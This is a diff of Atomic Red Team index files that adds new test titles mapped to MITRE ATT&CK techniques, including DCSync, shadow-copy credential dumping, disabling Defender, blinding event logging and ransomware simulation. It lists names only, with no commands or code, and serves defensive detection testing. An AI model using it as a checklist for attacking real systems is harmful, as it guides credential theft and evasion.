 execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt
 execution,T1059.003,Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt
+execution,T1059.003,Windows Command Shell,4,Simulate BlackByte Ransomware Print Bombing,6b2903ac-8f36-450d-9ad5-b220e8a2dcb9,powershell
 execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
 execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
 execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt

atomics/Indexes/Indexes-Markdown/index.md

@@ -40,11 +40,13 @@
   - Atomic Test #4: Simulating access to Chrome Login Data [windows]
   - Atomic Test #5: Simulating access to Opera Login Data [windows]
   - Atomic Test #6: Simulating access to Windows Firefox Login Data [windows]
+  - Atomic Test #7: Simulating access to Windows Edge Login Data [windows]
 - [T1552.002 Credentials in Registry](../../T1552.002/T1552.002.md)
   - Atomic Test #1: Enumeration for Credentials in Registry [windows]
   - Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
 - [T1003.006 DCSync](../../T1003.006/T1003.006.md)
   - Atomic Test #1: DCSync (Active Directory) [windows]
+  - Atomic Test #2: Run DSInternals Get-ADReplAccount [windows]
 - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1187 Forced Authentication](../../T1187/T1187.md)
@@ -101,8 +103,9 @@
   - Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows]
   - Atomic Test #4: Create Volume Shadow Copy with WMI [windows]
   - Atomic Test #5: Create Volume Shadow Copy remotely with WMI [windows]
-  - Atomic Test #6: Create Volume Shadow Copy with Powershell [windows]
-  - Atomic Test #7: Create Symlink to Volume Shadow Copy [windows]
+  - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows]
+  - Atomic Test #7: Create Volume Shadow Copy with Powershell [windows]
+  - Atomic Test #8: Create Symlink to Volume Shadow Copy [windows]
 - T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1040 Network Sniffing](../../T1040/T1040.md)
   - Atomic Test #1: Packet Capture Linux [linux]
@@ -184,6 +187,7 @@
   - Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux]
 - [T1123 Audio Capture](../../T1123/T1123.md)
   - Atomic Test #1: using device audio capture commandlet [windows]
+  - Atomic Test #2: Registry artefact when application use microphone [windows]
 - [T1119 Automated Collection](../../T1119/T1119.md)
   - Atomic Test #1: Automated Collection Command Prompt [windows]
   - Atomic Test #2: Automated Collection PowerShell [windows]
@@ -239,7 +243,8 @@
   - Atomic Test #5: Windows Screencapture [windows]
   - Atomic Test #6: Windows Screen Capture (CopyFromScreen) [windows]
 - T1213.002 Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1125 Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1125 Video Capture](../../T1125/T1125.md)
+  - Atomic Test #1: Registry artefact when application use webcam [windows]
 - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
 # privilege-escalation
@@ -292,7 +297,8 @@
   - Atomic Test #1: Change Default File Association [windows]
 - [T1078.004 Cloud Accounts](../../T1078.004/T1078.004.md)
   - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, windows, linux, macos]
-- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
+  - Atomic Test #1: COM Hijacking - InprocServer32 [windows]
 - [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md)
   - Atomic Test #1: ListCronjobs [containers]
   - Atomic Test #2: CreateCronjob [containers]
@@ -405,6 +411,7 @@
   - Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
   - Atomic Test #5: Task Scheduler via VBA [windows]
   - Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
+  - Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.002 Screensaver](../../T1546.002/T1546.002.md)
   - Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
@@ -574,6 +581,7 @@
   - Atomic Test #3: Impair Windows Audit Log Policy [windows]
   - Atomic Test #4: Clear Windows Audit Policy Config [windows]
   - Atomic Test #5: Disable Event Logging with wevtutil [windows]
+  - Atomic Test #6: Makes Eventlog blind with Phant0m [windows]
 - T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
   - Atomic Test #1: Disable Microsoft Defender Firewall [windows]
@@ -618,6 +626,7 @@
   - Atomic Test #24: Tamper with Windows Defender Evade Scanning -Process [windows]
   - Atomic Test #25: office-365-Disable-AntiPhishRule [office-365]
   - Atomic Test #26: Disable Windows Defender with DISM [windows]
+  - Atomic Test #27: Disable Defender with Defender Control [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -726,8 +735,10 @@
   - Atomic Test #2: Creating W32Time similar named service using sc [windows]
 - [T1036 Masquerading](../../T1036/T1036.md)
   - Atomic Test #1: System File Copied to Unusual Location [windows]
+  - Atomic Test #2: Malware Masquerading and Execution from Zip File [windows]
 - [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
   - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
+  - Atomic Test #2: Masquerade as a built-in system executable [windows]
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1112 Modify Registry](../../T1112/T1112.md)
@@ -737,6 +748,8 @@
   - Atomic Test #4: Add domain to Trusted sites Zone [windows]
   - Atomic Test #5: Javascript in registry [windows]
   - Atomic Test #6: Change Powershell Execution Policy to Bypass [windows]
+  - Atomic Test #7: BlackByte Ransomware Registry Changes - CMD [windows]
+  - Atomic Test #8: BlackByte Ransomware Registry Changes - Powershell [windows]
 - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218.005 Mshta](../../T1218.005/T1218.005.md)
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
@@ -843,7 +856,8 @@
 - [T1014 Rootkit](../../T1014/T1014.md)
   - Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
   - Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
-- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1564.006 Run Virtual Instance](../../T1564.006/T1564.006.md)
+  - Atomic Test #1: Register Portable Virtualbox [windows]
 - [T1218.011 Rundll32](../../T1218.011/T1218.011.md)
   - Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows]
   - Atomic Test #2: Rundll32 execute VBscript command [windows]
@@ -853,6 +867,9 @@
   - Atomic Test #6: Rundll32 setupapi.dll Execution [windows]
   - Atomic Test #7: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows]
   - Atomic Test #8: Launches an executable using Rundll32 and pcwutl.dll [windows]
+  - Atomic Test #9: Execution of non-dll using rundll32.exe [windows]
+  - Atomic Test #10: Rundll32 with Ordinal Value [windows]
+  - Atomic Test #11: Rundll32 with Control_RunDLL [windows]
 - T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1553.003 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -875,6 +892,7 @@
   - Atomic Test #6: Microsoft.Workflow.Compiler.exe Payload Execution [windows]
   - Atomic Test #7: Renamed Microsoft.Workflow.Compiler.exe Payload Executions [windows]
   - Atomic Test #8: Invoke-ATHRemoteFXvGPUDisablementCommand base test [windows]
+  - Atomic Test #9: DiskShadow Command Execution [windows]
 - [T1216 Signed Script Proxy Execution](../../T1216/T1216.md)
   - Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
   - Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows]
@@ -948,6 +966,10 @@
   - Atomic Test #1: Admin Account Manipulate [windows]
   - Atomic Test #2: Domain Account and Group Manipulate [windows]
   - Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
+  - Atomic Test #4: Azure - adding user to Azure AD role [azure-ad]
+  - Atomic Test #5: Azure - adding service principal to Azure AD role [azure-ad]
+  - Atomic Test #6: Azure - adding user to Azure role in subscription [iaas:azure]
+  - Atomic Test #7: Azure - adding service principal to Azure role in subscription [iaas:azure]
 - T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1137.006 Add-ins](../../T1137.006/T1137.006.md)
@@ -993,7 +1015,8 @@
 - [T1078.004 Cloud Accounts](../../T1078.004/T1078.004.md)
   - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, windows, linux, macos]
 - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
+  - Atomic Test #1: COM Hijacking - InprocServer32 [windows]
 - T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md)
   - Atomic Test #1: ListCronjobs [containers]
@@ -1117,6 +1140,7 @@
   - Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
   - Atomic Test #5: Task Scheduler via VBA [windows]
   - Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
+  - Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.002 Screensaver](../../T1546.002/T1546.002.md)
   - Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
@@ -1239,6 +1263,7 @@
   - Atomic Test #5: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt [windows]
   - Atomic Test #6: List Mozilla Firefox bookmarks on Windows with command prompt [windows]
   - Atomic Test #7: List Internet Explorer Bookmarks using the command prompt [windows]
+  - Atomic Test #8: List Safari Bookmarks on MacOS [macos]
 - T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1580 Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1347,6 +1372,7 @@
   - Atomic Test #12: Remote System Discovery - ip neighbour [linux]
   - Atomic Test #13: Remote System Discovery - ip route [linux]
   - Atomic Test #14: Remote System Discovery - ip tcp_metrics [linux]
+  - Atomic Test #15: Enumerate domain computers within Active Directory using DirectorySearcher [windows]
 - [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
   - Atomic Test #1: Security Software Discovery [windows]
   - Atomic Test #2: Security Software Discovery - powershell [windows]
@@ -1569,6 +1595,7 @@
   - Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
   - Atomic Test #5: Task Scheduler via VBA [windows]
   - Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
+  - Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1569.002 Service Execution](../../T1569.002/T1569.002.md)
@@ -1586,6 +1613,8 @@
 - [T1059.004 Unix Shell](../../T1059.004/T1059.004.md)
   - Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
   - Atomic Test #2: Command-Line Interface [macos, linux]
+  - Atomic Test #3: Harvest SUID executable files [linux]
+  - Atomic Test #4: LinEnum tool execution [linux]
 - T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1059.005 Visual Basic](../../T1059.005/T1059.005.md)
   - Atomic Test #1: Visual Basic script execution to gather local computer information [windows]
@@ -1595,6 +1624,7 @@
   - Atomic Test #1: Create and Execute Batch Script [windows]
   - Atomic Test #2: Writes text to a file and displays it. [windows]
   - Atomic Test #3: Suspicious Execution via Windows Command Shell [windows]
+  - Atomic Test #4: Simulate BlackByte Ransomware Print Bombing [windows]
 - [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
   - Atomic Test #1: WMI Reconnaissance Users [windows]
   - Atomic Test #2: WMI Reconnaissance Processes [windows]
@@ -1703,7 +1733,11 @@
 - T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1090.003 Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1090.003 Multi-hop Proxy](../../T1090.003/T1090.003.md)
+  - Atomic Test #1: Psiphon [windows]
+  - Atomic Test #2: Tor Proxy Usage - Windows [windows]
+  - Atomic Test #3: Tor Proxy Usage - Debian/Ubuntu [linux]
+  - Atomic Test #4: Tor Proxy Usage - MacOS [macos]
 - T1026 Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1095 Non-Application Layer Protocol](../../T1095/T1095.md)
   - Atomic Test #1: ICMP C2 [windows]

atomics/Indexes/Indexes-Markdown/linux-index.md

@@ -458,6 +458,10 @@
 # persistence
 - [T1098 Account Manipulation](../../T1098/T1098.md)
   - Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
+  - Atomic Test #4: Azure - adding user to Azure AD role [azure-ad]
+  - Atomic Test #5: Azure - adding service principal to Azure AD role [azure-ad]
+  - Atomic Test #6: Azure - adding user to Azure role in subscription [iaas:azure]
+  - Atomic Test #7: Azure - adding service principal to Azure role in subscription [iaas:azure]
 - T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1137.006 Add-ins [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md)
@@ -675,7 +679,8 @@
 - T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1090.003 Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1090.003 Multi-hop Proxy](../../T1090.003/T1090.003.md)
+  - Atomic Test #3: Tor Proxy Usage - Debian/Ubuntu [linux]
 - T1026 Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1095 Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -733,6 +738,8 @@
 - [T1059.004 Unix Shell](../../T1059.004/T1059.004.md)
   - Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
   - Atomic Test #2: Command-Line Interface [macos, linux]
+  - Atomic Test #3: Harvest SUID executable files [linux]
+  - Atomic Test #4: LinEnum tool execution [linux]
 - T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1059.005 Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 

atomics/Indexes/Indexes-Markdown/macos-index.md

@@ -294,6 +294,7 @@
 - [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
   - Atomic Test #2: List Mozilla Firefox Bookmark Database Files on macOS [macos]
   - Atomic Test #3: List Google Chrome Bookmark JSON Files on macOS [macos]
+  - Atomic Test #8: List Safari Bookmarks on MacOS [macos]
 - T1087.002 Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1069.002 Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1083 File and Directory Discovery](../../T1083/T1083.md)
@@ -472,7 +473,8 @@
 - T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1090.003 Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1090.003 Multi-hop Proxy](../../T1090.003/T1090.003.md)
+  - Atomic Test #4: Tor Proxy Usage - MacOS [macos]
 - T1026 Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1095 Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -23,11 +23,13 @@
   - Atomic Test #4: Simulating access to Chrome Login Data [windows]
   - Atomic Test #5: Simulating access to Opera Login Data [windows]
   - Atomic Test #6: Simulating access to Windows Firefox Login Data [windows]
+  - Atomic Test #7: Simulating access to Windows Edge Login Data [windows]
 - [T1552.002 Credentials in Registry](../../T1552.002/T1552.002.md)
   - Atomic Test #1: Enumeration for Credentials in Registry [windows]
   - Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
 - [T1003.006 DCSync](../../T1003.006/T1003.006.md)
   - Atomic Test #1: DCSync (Active Directory) [windows]
+  - Atomic Test #2: Run DSInternals Get-ADReplAccount [windows]
 - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1187 Forced Authentication](../../T1187/T1187.md)
@@ -76,8 +78,9 @@
   - Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows]
   - Atomic Test #4: Create Volume Shadow Copy with WMI [windows]
   - Atomic Test #5: Create Volume Shadow Copy remotely with WMI [windows]
-  - Atomic Test #6: Create Volume Shadow Copy with Powershell [windows]
-  - Atomic Test #7: Create Symlink to Volume Shadow Copy [windows]
+  - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows]
+  - Atomic Test #7: Create Volume Shadow Copy with Powershell [windows]
+  - Atomic Test #8: Create Symlink to Volume Shadow Copy [windows]
 - [T1040 Network Sniffing](../../T1040/T1040.md)
   - Atomic Test #3: Packet Capture Windows Command Prompt [windows]
   - Atomic Test #4: Windows Internal Packet Capture [windows]
@@ -131,6 +134,7 @@
   - Atomic Test #4: Compress Data and lock with password for Exfiltration with 7zip [windows]
 - [T1123 Audio Capture](../../T1123/T1123.md)
   - Atomic Test #1: using device audio capture commandlet [windows]
+  - Atomic Test #2: Registry artefact when application use microphone [windows]
 - [T1119 Automated Collection](../../T1119/T1119.md)
   - Atomic Test #1: Automated Collection Command Prompt [windows]
   - Atomic Test #2: Automated Collection PowerShell [windows]
@@ -169,7 +173,8 @@
   - Atomic Test #5: Windows Screencapture [windows]
   - Atomic Test #6: Windows Screen Capture (CopyFromScreen) [windows]
 - T1213.002 Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1125 Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1125 Video Capture](../../T1125/T1125.md)
+  - Atomic Test #1: Registry artefact when application use webcam [windows]
 - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
 # privilege-escalation
@@ -218,7 +223,8 @@
   - Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
 - [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
   - Atomic Test #1: Change Default File Association [windows]
-- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
+  - Atomic Test #1: COM Hijacking - InprocServer32 [windows]
 - [T1134.002 Create Process with Token](../../T1134.002/T1134.002.md)
   - Atomic Test #1: Access Token Manipulation [windows]
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -293,6 +299,7 @@
   - Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
   - Atomic Test #5: Task Scheduler via VBA [windows]
   - Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
+  - Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.002 Screensaver](../../T1546.002/T1546.002.md)
   - Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
@@ -404,6 +411,7 @@
   - Atomic Test #3: Impair Windows Audit Log Policy [windows]
   - Atomic Test #4: Clear Windows Audit Policy Config [windows]
   - Atomic Test #5: Disable Event Logging with wevtutil [windows]
+  - Atomic Test #6: Makes Eventlog blind with Phant0m [windows]
 - [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
   - Atomic Test #1: Disable Microsoft Defender Firewall [windows]
   - Atomic Test #2: Disable Microsoft Defender Firewall via Registry [windows]
@@ -428,6 +436,7 @@
   - Atomic Test #23: Tamper with Windows Defender Evade Scanning -Extension [windows]
   - Atomic Test #24: Tamper with Windows Defender Evade Scanning -Process [windows]
   - Atomic Test #26: Disable Windows Defender with DISM [windows]
+  - Atomic Test #27: Disable Defender with Defender Control [windows]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -497,7 +506,9 @@
   - Atomic Test #2: Creating W32Time similar named service using sc [windows]
 - [T1036 Masquerading](../../T1036/T1036.md)
   - Atomic Test #1: System File Copied to Unusual Location [windows]
-- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+  - Atomic Test #2: Malware Masquerading and Execution from Zip File [windows]
+- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
+  - Atomic Test #2: Masquerade as a built-in system executable [windows]
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1112 Modify Registry](../../T1112/T1112.md)
   - Atomic Test #1: Modify Registry of Current User Profile - cmd [windows]
@@ -506,6 +517,8 @@
   - Atomic Test #4: Add domain to Trusted sites Zone [windows]
   - Atomic Test #5: Javascript in registry [windows]
   - Atomic Test #6: Change Powershell Execution Policy to Bypass [windows]
+  - Atomic Test #7: BlackByte Ransomware Registry Changes - CMD [windows]
+  - Atomic Test #8: BlackByte Ransomware Registry Changes - Powershell [windows]
 - [T1218.005 Mshta](../../T1218.005/T1218.005.md)
   - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
   - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows]
@@ -595,7 +608,8 @@
 - [T1207 Rogue Domain Controller](../../T1207/T1207.md)
   - Atomic Test #1: DCShadow (Active Directory) [windows]
 - T1014 Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1564.006 Run Virtual Instance](../../T1564.006/T1564.006.md)
+  - Atomic Test #1: Register Portable Virtualbox [windows]
 - [T1218.011 Rundll32](../../T1218.011/T1218.011.md)
   - Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows]
   - Atomic Test #2: Rundll32 execute VBscript command [windows]
@@ -605,6 +619,9 @@
   - Atomic Test #6: Rundll32 setupapi.dll Execution [windows]
   - Atomic Test #7: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows]
   - Atomic Test #8: Launches an executable using Rundll32 and pcwutl.dll [windows]
+  - Atomic Test #9: Execution of non-dll using rundll32.exe [windows]
+  - Atomic Test #10: Rundll32 with Ordinal Value [windows]
+  - Atomic Test #11: Rundll32 with Control_RunDLL [windows]
 - T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1553.003 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -621,6 +638,7 @@
   - Atomic Test #6: Microsoft.Workflow.Compiler.exe Payload Execution [windows]
   - Atomic Test #7: Renamed Microsoft.Workflow.Compiler.exe Payload Executions [windows]
   - Atomic Test #8: Invoke-ATHRemoteFXvGPUDisablementCommand base test [windows]
+  - Atomic Test #9: DiskShadow Command Execution [windows]
 - [T1216 Signed Script Proxy Execution](../../T1216/T1216.md)
   - Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
   - Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows]
@@ -705,7 +723,8 @@
 - [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
   - Atomic Test #1: Change Default File Association [windows]
 - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1546.015 Component Object Model Hijacking](../../T1546.015/T1546.015.md)
+  - Atomic Test #1: COM Hijacking - InprocServer32 [windows]
 - T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -785,6 +804,7 @@
   - Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
   - Atomic Test #5: Task Scheduler via VBA [windows]
   - Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
+  - Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
